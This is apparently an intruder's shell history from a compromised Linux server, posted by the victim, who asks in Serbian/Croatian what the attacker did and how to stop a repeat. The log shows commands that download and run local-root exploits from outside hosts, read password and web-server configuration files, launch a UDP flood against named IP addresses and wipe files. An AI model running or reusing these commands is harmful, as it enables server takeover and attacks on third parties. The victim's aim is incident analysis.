<?xml version = "1.0"?>
<Request version = "1.0" timestamp = "6/3/2003 10:14:11 AM">
<param id = "_ActionId" value = "PING" type = "string"/>
DOTI0000001Bint main()
{ return(0);
}
uname -a
cd /tmp
wget andyhot.di.uoa.gr/brk2
chmod +x brk2
./brk2
./brk2
ls
cd /tmp
ls
mkdir .f
cd .f
ls
wget http://hoob.webcindario.com/brk2
chmod 777 brk2
chmod a+x brk2
./brk2
cat etc/issue
locate httpd.conf
cat
cat /usr/local/apache/conf/httpd.conf |grep ServerName
ls
wget www.ducas7.com.br/insecurity/mr
chmod 777 mr
chmod a+x mr
./mr
wget www.ducas7.com.br/insecurity/
wget www.ducas7.com.br/insecurity/kmod
wget www.ducas7.com.br/insecurity/brk3
wget www.ducas7.com.br/insecurity/brk
wget www.ducas7.com.br/insecurity/brk1
USER co "" "*adresa mog server*" :co2
w
cd /var/tmp
ls -al
wget geocities.com/mickeymhack/x.tar.gz
tar zxf x.tar.gz
cd slider
./x
cat /etc/passwd|grep *mojusername*
./x
wget geocities.com/mickeymhack/y.tar.gz
tar zxf y.tar.gz
./loginx
cat /etc/issue
uname -a
wget geocities.com/mickeymhack/superbsd.tgz
tar zxf superbsd.tgz
cd obake
./7.sh
./3
exec ./3 4155
cd /var/tmp/slider
cd obake
ls -al
./5
./6 -d
./6 -e
wget geocities.com/mickeymhack/root.tar.gz
tar zxf root.tar.gz
cd root
./memo
id
./memo
./x
local/x
exec local/x 14083
c d/var/tmp
ls -al
cat /etc/passwd|grep np*
cd /home/*mojusername*
ls -al
cd www
ls -al
cat index.php
cd cgi-bin
ls -al
cat randhtml.cgi
PuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY6cPuTTYPuTTYPuTTYPuTTY
p
perl randhtml.cgi
ls -al
perl entropybanner.cgi
cd cgiecho
perl cgiecho
cd ..
ls -al
cd /var/tmp
ls -al
passwd
cd /var/tmp
rm -rf *
kill -9 -1
id
ls
uname -a
w
ps aux
cd
ls
cd
ls
pwd
cd ..
pwd
cd ..
pwd
ls
cd ..
ls
cd
ls
wget ftp://83.132.192.24/sys.pl
chmod +x sys.pl
./sys.pl
wget ftp://83.132.192.24/mremap_pte
chmod +777 mremap_pte
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
id
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
./mremap_pte 0
ps x
ps aux
ls
rm -rf mremap_pte
wget ftp://83.132.192.24/udp.pl
chmod +x udp.pl
./udp.pl 208.53.149.89 0 0
ps x
kill -9 23970
./udp.pl 67.15.113.18 0 0
e
ps x
wget ftp://83.132.192.24/jr.txt
perl jr.txt
host 212.113.174.10
exit
ls -a
cd var
cd tmp
ls -a
wget http://www.intranorth.com.br/xpl/xpl_brk;chmod 777 xpl_brk;./xpl_brk
wget http://hoob.webcindario.com/xpl_brk;chmod 777 xpl_brk;./xpl_brk
wget http://hoob.webcindario.com/brk2;chmod 777 brk2;./brk2
http://www.intranorth.com.br/xpl/mremap_pte
wget http://www.intranorth.com.br/xpl/mremap_pte;chmod 777 mremap_pte;./mremap_pte
exit
w
cd
ls
perl jr.txt
exit
id
uname -a
w
cd
ls
wget http://www.thecurse.pop.com.br/xpl/l/brk
chmod +777 brk
./brk
rm -rf brk
wget ftp://83.132.192.24/jp.txt
ps aux
perl jp.txt
exit
exit
ls
cd /var/tmp
ls
rm r*
ls
less jp.txt
Možete li mi malo objasniti šta je haker sve u radio i šta da preduzmem da se ovo više ne ponovi?